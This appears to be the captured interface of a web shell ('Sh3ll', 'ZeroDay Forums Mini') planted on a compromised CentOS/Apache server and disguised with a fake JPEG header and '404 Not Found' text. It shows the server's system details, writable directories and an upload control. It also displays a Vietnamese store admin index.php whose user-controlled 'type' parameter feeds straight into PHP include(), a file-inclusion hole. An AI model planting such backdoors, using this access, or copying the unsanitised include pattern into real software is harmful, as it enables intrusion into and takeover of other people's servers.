����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/oladi/code/admin/store/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/oladi/code/admin/store/index.php
<?php
$CORE->page_title = 'Quản lý cửa hàng';
$type='list';
if(isset($CORE->input['type']) && $CORE->input['type']!=''){
    $type=$CORE->input['type'];
}
include $type.'.php';
include ROOT_PATH . 'include/block/header_admin.php';
?>
    <div class="content-wrapper">
        <div class="content-header">
            <div class="container-fluid">
                <div class="row mb-2">
                    <div class="col-sm-6">
                        <h1 class="m-0">Quản lý cửa hàng</h1>
                    </div>
                    <div class="col-sm-6">
                        <ol class="breadcrumb float-sm-right">
                            <li class="breadcrumb-item"><a href="?">Home</a></li>
                            <li class="breadcrumb-item active"><a href="?act=admin&code=product">Quản lý cửa hàng</a></li>
                        </ol>
                    </div>
                </div>
            </div>
        </div>
        <section class="content">
            <div class="container-fluid">
                <div class="row">
                    <div class="col-md-12">
                        <?php
                        include $type.'_tpl.php';
                        ?>
                    </div>
                </div>
            </div>
        </section>
    </div>
    <script>
        $('#tree').checktree();
    </script>
    <script>
        $(function () {
            bsCustomFileInput.init();
        });
    </script>
<?php
include 'include/block/footer_admin.php';
?>

ZeroDay Forums Mini